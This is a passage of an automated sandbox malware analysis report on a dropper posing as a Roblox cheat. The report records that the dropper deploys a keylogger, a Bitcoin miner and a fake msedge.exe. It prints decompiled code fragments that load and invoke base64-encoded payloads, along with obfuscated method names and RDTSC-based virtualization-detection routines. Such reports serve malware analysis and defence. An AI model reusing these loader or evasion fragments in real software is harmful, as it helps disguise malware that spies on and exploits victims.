            Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: d3d11.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: dxgi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: d3d10warp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: winbrand.dllJump to behavior
            Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
            Source: C:\Windows\System32\cmd.exeAutomated click: OK
            Source: C:\Windows\System32\cmd.exeAutomated click: OK
            Source: C:\Windows\System32\cmd.exeAutomated click: OK
            Source: C:\Windows\System32\cmd.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeAutomated click: OK
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeAutomated click: OK
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: cheat_roblox.exeStatic PE information: Image base 0x140000000 > 0x60000000
            Source: cheat_roblox.exeStatic file information: File size 2675335 > 1048576
            Source: cheat_roblox.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
            Source: cheat_roblox.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
            Source: cheat_roblox.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
            Source: cheat_roblox.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: cheat_roblox.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
            Source: cheat_roblox.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
            Source: cheat_roblox.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: cheat_roblox.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: Google.Widevine.CDM.dll.pdb source: Google.Widevine.CDM.dll.8.dr
            Source: Binary string: C:\buildAgent\work\ci_deploy_ninja_boot-x86_git\build.ninja\common\vs2019\x86\release\Installer\Windows\RobloxPlayerInstaller.pdb source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD565E9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: cheat_roblox.exe
            Source: Binary string: zserialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: cheat_roblox.exe, 00000000.00000003.2114148153.000001CD56234000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: serialNumbersignatureissuervaliditysubjectissuerUIDsubjectUIDextensionsX509_CINFcert_infosig_algX509CERTIFICATEcompiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -Oy- -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_BN_ASM_PART_WORDS -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DRC4_ASM -DMD5_ASM -DRMD160_ASM -DAESNI_ASM -DVPAES_ASM -DWHIRLPOOL_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DPOLY1305_ASM source: RobloxPlayerInstaller.exe, 00000004.00000000.2127225395.0000000001288000.00000002.00000001.01000000.00000009.sdmp, RobloxPlayerInstaller.exe, 00000004.00000002.3811071490.0000000001288000.00000002.00000001.01000000.00000009.sdmp
            Source: cheat_roblox.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: cheat_roblox.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: cheat_roblox.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: cheat_roblox.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: cheat_roblox.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            .NET source code contains method to dynamically call methods (often used by packers)
            Source: BitCoin_miner.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: BitCoin_miner.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{w3NlLrUpwn05JMopXTd8mSE7UP5bcp._9YAUzJ19chMfqFNJ6TCoEOI8QxrQHh,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.YxYN6QWQIWu5XVAci3urjI00UEnFJ7,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.CCtpPZimJrMU8onPEHRRYLPAiv05nO,w3NlLrUpwn05JMopXTd8mSE7UP5bcp.MfOa5980QCPNnU9x3V9dVBMB71uRJj,dtVFTVK0Ux3SN1R.iCtkLrztKkZDBFY()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{N3zhZ0gcLgaQW9k[2],dtVFTVK0Ux3SN1R.By4JChD42wKAESJEe0khbaDthCWknJS4g49dw5i7eJRFccFB(Convert.FromBase64String(N3zhZ0gcLgaQW9k[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: msedge.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: msedge.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            .NET source code contains potential unpacker
            Source: BitCoin_miner.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: BitCoin_miner.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: BitCoin_miner.exe.0.dr, Messages.cs.Net Code: Memory
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: LT2zntgXTGjsdzj2afFrTKkcoonKiN System.AppDomain.Load(byte[])
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: PBtLR1iSSO49jTq System.AppDomain.Load(byte[])
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.cs.Net Code: PBtLR1iSSO49jTq
            Source: msedge.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: msedge.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: msedge.exe.0.dr, Messages.cs.Net Code: Memory
            Source: RobloxPlayerInstaller.exe.0.drStatic PE information: 0xADBEC9FB [Mon May 15 23:38:35 2062 UTC]
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile created: C:\Users\user\AppData\Local\Temp\__tmp_rar_sfx_access_check_5872578Jump to behavior
            Source: cheat_roblox.exeStatic PE information: section name: .didat
            Source: cheat_roblox.exeStatic PE information: section name: _RDATA
            Source: Google.Widevine.CDM.dll.8.drStatic PE information: section name: .00cfg
            Source: Google.Widevine.CDM.dll.8.drStatic PE information: section name: .gxfg
            Source: Google.Widevine.CDM.dll.8.drStatic PE information: section name: .retplne
            Source: Google.Widevine.CDM.dll.8.drStatic PE information: section name: .voltbl
            Source: Google.Widevine.CDM.dll.8.drStatic PE information: section name: _RDATA
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E95166 push rsi; retf 0_2_00007FF693E95167
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E95156 push rsi; retf 0_2_00007FF693E95157
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeCode function: 4_2_01233175 push ecx; ret 4_2_01233188
            Source: Keyloger.exe.0.dr, albqjOvwCQYLvRXxiGyhIpdY44vi5RLlo7VzM72FUP7qbNEq.csHigh entropy of concatenated method names: '_4MOkoXT607b9ZVv18hCOaQeksKQK1QY2Z59Hgn3vnGNBTDWY', 'aoVp1bvo8BQemLHmXPz6S0y0KAL2MZMS1pG20J1rmkO1yH36', 'yAFN5ozhCBuI45z4NTpIpiKfB19pUh9mAx6dQVO83WEQzG9S', '_1ORCLm148GvAasbvzvKe0j3op', 'xz4IVJsbdqQjT3fvrAzMqnpUJ', 'd5IEku84RPpe3jqqxUoOxlid9', 'baJVbebdBRSG0vXeqpQbaFGhF', 'PdROi8GC1qEzGAZ3jL0JM4kS1', '_4vWYxVH7giIuQNZUquEn1HcOH', 'iweLYuR0sjls7DY5DlgNakVEM'
            Source: Keyloger.exe.0.dr, qPFRCBxxevtOrm6kkA6S3T0BVLfQqKPGErYWluL1k515NkyAjTBIKTN89KogayXJPuAweWS9osecqggfc7KqoqU1.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'OvBZh7NuYxNyoawDWVgb1bvQvny4ey9hxzXnZmUKYwMyHV3G', 'D1pK9yah6bW1RSKhi0bojd7k0gErawVt3UAqXVftOOGZ8Ek7', 'Amz2GUO9F3xqCrSqrojRM1z27y3P33TQxbcBuP2jeOuVoQ0I', 'XrVGbup25w9XJj82jHd5OO6JqCynsc4QvmRbz66DPHV276dk'
            Source: Keyloger.exe.0.dr, tMXwX3tWlMuOZgJ.csHigh entropy of concatenated method names: 'LjeIsJHhRum59xL', '_6RsfQAJJYyt0J9HkPqIBAQeU380h3KOSQt3dHGv6rcNETpFQfgCb6boQcTnPkAwvsrPG8NTTAwKpmugXZhP', 'zaWTERDp5aT0SDSKgqc0pwq0a7ceYdFVq33bH5rm90KOgrgYcf23ikS2yDHBmgzl4t2KKfhUgFaKblNJ5k3', 'sWVdXUK0j8UTqkeKJ34zN69ydPubFvVaflAAl1XEpkV2r1QsYGAgJphVMO9CuJcZXSLKFk9ZU4EZ9kNpbPz', 'lFKVqnfF4sk3NIn44QcIBHZEg'
            Source: Keyloger.exe.0.dr, V2Dstkpoa4KAEaCoYXeMa7Hkw0t8Bq.csHigh entropy of concatenated method names: '_0c5jTYhRyonOUDziLx9bjo6xsSexAe', '_25wKNHm120NsmF8qQvTNtHz3RfwaXK', 'viLdoQDOYFFpv6KJ7CRK3qfhhqjyZ8', 'oyu0xUeMkLUDSGAbVhHha949466V1K', 'Vl9igX7Uc5X0UR61FqWGnXY9OhKp3l', '_5AqL7zP7f68dYFzd47NqgQFLffkmOs', 'HrBKo0STAWa5C612O2nnGfOgnFiJTT', 'EZ9n76FqTYmhSSOefwFVuL5ThwtwlO', 'E14zUxLx5YeoVLmDYLzZ6cZw9IN0jq', 'zBGEheUMvhUAXOJ5xyiI8x2n5H3mDM'
            Source: Keyloger.exe.0.dr, dtVFTVK0Ux3SN1R.csHigh entropy of concatenated method names: '_7YMtWoQN5HfGCSK', 'OkqS6ol8M17XMmP', 'uNW6GrfQGz1M2XM', 'Ii6cHrN7BYLDzEF', '_5aJsNyLDXOhokOb', '_9vn0AlUd8GUTBri', 'JvICn3rRI6iioCk', 'UWKlns5zDZ2WYha', '_7hsyClPI7F56lLF', 'oG7pcy3sU6P1wO9'
            Source: Keyloger.exe.0.dr, girTRrhIQMQcVyDbxuRrxGQG7zNOoB.csHigh entropy of concatenated method names: 'yz3ulHWN9n14oJZA9i5vmrxphpzaCp', 'LT2zntgXTGjsdzj2afFrTKkcoonKiN', 'RVfS3lUZ13RpRJx', '_36yQU5duIkCbW2T', 'xm86z0xRhaJxcNt', 'meydQmflaU7lI44', 'ulkLjOcP0yxW7UI', 'b6Kn4aSdInWG889', 'buvrIstkF8NGBRb', 'YEEc5g9ZTXWiw5i'
            Source: Keyloger.exe.0.dr, 3hMB2la9XyjPtIBDiudYxRNIVlJFvm.csHigh entropy of concatenated method names: 'LfvVtvqV46cUkGAPMYI4VquR3SMv2D', 'vIoAF5cBXshvrNilb2DuPcULPAXNvn', 'kA8SgQYodhg33g9XqJGDIcdyDuU2eq', 'lQv3wZATHx75FgR1TEYl60evq1ah4O', 'PSUdXouR3XnWp7uzoDx9bmHtKpUEQn', 'hianEuAU3qLDiz0mgrS8dJ9EtIpg4FKSm', '_1Uzw1Jv75GWN68eZuqAFXHg859jSuA3VZ', 'Nm7Liat39gbXWFp1qqe6HHX35VDFiL7Da', 'i9EMzetgnoZiy3VF71knEPeukHZBiLL2k', 'jUtPhbUZdmJ9iBO2Yt3x7WmdMEVCHS7NK'
            Source: Keyloger.exe.0.dr, WPBnCaT3d8cYQmg.csHigh entropy of concatenated method names: 'XqbpRmwJ4LtIvAR', 'P0jTCqOar3cv9vv', 'cQ4yWoyO6QI0787', '_9bNc4FZpvPn2d8N', 'tSubarXMNHmpIgk', '_0QpL3D9FsZYYURB', 'e12J0P1bomhydt6', 'a8HR9xsSDvlWrSZ', 'fkNSnoNe84RdGzT', 'De6iaF9HVBWEBkc'
            Source: Keyloger.exe.0.dr, R0AwzNAU4OLQBy5.csHigh entropy of concatenated method names: '_8DVPMgIt5LmyReW', 'BZVAT9UWtB9Y41EBslDUkcaMcEz93wnp4TwFdsJAwNlh5HH3J22aeHQ4iYM26w4Bz', 'xRvMGytdQ2t0vvaBZmUAw8zGZw6lREIjCy8Hi0yW4uNgQnuaYaSOw4QBYq6OZfOm6', 'YZHXocKFTuIAqCnIKSsaOe8Bu7xKEX61eFFh0gCYv1doZqxiACFmQx8wx0U5Tmaxw', 'KseJ4CZxDxgasaIvvghOQYUtjhm1qNwU5KPV4WJnB97il4HcI4MBrgr30GaNE3nxx'
            Source: Keyloger.exe.0.dr, tUULgqwzOy3tsY4.csHigh entropy of concatenated method names: 'XyjKcb0SD0Rnsly', 'onnajoto1IWR83c', '_4JRwDCvuPsxAFxT', 'TUfvtJiSrFTFqfO', 'hKn7O9jilUma2Zw0Est6bw1gkRujD0aPP8Houzr8kpBXX8Is19SryYZ18XrIvaHfPSx1xl3SMjVYx3EGcSp', 'h4RQD1MY3oKURj7ED4KIYRKHKVX617yrfjpvxqbClLGSMVnQNaxibqcg3p41qk3VHfmtekuu5XcduvTUIrL', '_0W2Q7XRDNANGyYK7eYQ1CBoe0T8xbd2SwsQUxdTTxt63ViT6oSnfQrQtDAtoh5P5JHq9VyPg2PLPvvUYpYy', 'qDu4N9S6yNJjuF2IyC1Dipv55nveXbngGs3oU5y97y0gm1zMrkqsSs3csriArDoT7m4uVmnmZE7RcOPNSr2', 'XAGEDgUZ2PI2TXU92O0Frre9DggfBwEZw8SBXJzLTqRAXOPeOXIvKsXXvekl5fCqtfggq9yas1x0W6UAKyW', '_2yOrKM1R5TZHaIoRlmRHTfmfg0sAWQFAnGRUnIyLkL8leSVsnLbKF2mAFPNh8FY82TUpGr5X3XvinrE8GQD'
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile created: C:\Users\user\AppData\Local\Temp\Keyloger.exeJump to dropped file
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile created: C:\Users\user\AppData\Local\Temp\ msedge.exeJump to dropped file
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile created: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeJump to dropped file
            Source: C:\Users\user\Desktop\cheat_roblox.exeFile created: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJump to dropped file
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\Google.Widevine.CDM.dllJump to dropped file
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping6712_1851964843\Google.Widevine.CDM.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeFile created: C:\Users\user\AppData\Local\Roblox\logs\RobloxPlayerInstaller_2ACC2.logJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeRDTSC instruction interceptor: First address: 10239F0 second address: 1023A8B instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ecx+20h], eax 0x00000005 mov dword ptr [ecx+24h], edx 0x00000008 mov dword ptr [ecx+2Ch], 00000016h 0x0000000f mov dword ptr [ecx+30h], 00000000h 0x00000016 mov dword ptr [ecx+34h], 00000000h 0x0000001d mov dword ptr [ecx+38h], 00000000h 0x00000024 mov dword ptr [ecx+48h], 00000000h 0x0000002b mov dword ptr [ecx+4Ch], 00000000h 0x00000032 mov dword ptr [ecx+50h], 00000000h 0x00000039 mov dword ptr [ecx+54h], 00000000h 0x00000040 mov dword ptr [ecx+68h], 00000000h 0x00000047 mov dword ptr [ecx+60h], 00000000h 0x0000004e mov dword ptr [ecx+64h], 00000000h 0x00000055 mov dword ptr [ecx+6Ch], 00000001h 0x0000005c mov dword ptr [ecx+10h], 0000003Ch 0x00000063 mov dword ptr [ecx], 00000000h 0x00000069 mov dword ptr [ecx+00088978h], FFFFFFFFh 0x00000073 mov dword ptr [ecx+00088D80h], FFFFFFFFh 0x0000007d mov dword ptr [ecx+00089188h], FFFFFFFFh 0x00000087 mov dword ptr [ecx+00089590h], FFFFFFFFh 0x00000091 mov dword ptr [ecx+00089998h], FFFFFFFFh 0x0000009b rdtsc
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeWindow / User API: threadDelayed 9646Jump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Keyloger.exeJump to dropped file
            Source: C:\Users\user\Desktop\cheat_roblox.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ msedge.exeJump to dropped file
            Source: C:\Users\user\Desktop\cheat_roblox.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\BitCoin_miner.exeJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_4-1888
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe TID: 2332Thread sleep time: -44981s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe TID: 2332Thread sleep time: -46239s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exe TID: 2332Thread sleep time: -57753s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\RobloxPlayerInstaller.exeFile Volume queried: C:\Users\user\AppData\Local\Temp\Roblox\http FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E7B190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF693E7B190
            Source: C:\Users\user\Desktop\cheat_roblox.exeCode function: 0_2_00007FF693E640BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF693E640BC
